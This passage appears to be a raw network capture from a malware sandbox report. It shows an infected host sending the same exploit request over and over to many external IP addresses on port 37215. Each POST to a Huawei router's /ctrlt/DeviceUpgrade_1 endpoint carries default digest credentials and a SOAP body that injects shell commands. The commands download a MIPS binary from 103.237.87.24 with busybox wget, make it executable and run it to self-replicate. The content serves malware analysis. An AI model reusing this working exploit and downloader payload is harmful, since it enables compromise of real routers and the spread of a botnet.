6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  796192.168.2.1360668157.128.232.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358840942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  797192.168.2.134449241.160.55.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358855009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  798192.168.2.135220441.127.94.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358872890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  799192.168.2.134601641.14.51.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358887911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  800192.168.2.1335272197.230.236.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358894110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  801192.168.2.134707241.131.3.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358908892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  802192.168.2.135649041.218.31.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358916998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  803192.168.2.1355810163.215.3.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358932972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  804192.168.2.1359144197.109.33.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362044096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  805192.168.2.1341726157.194.230.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362060070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  806192.168.2.1341364197.234.186.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362077951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
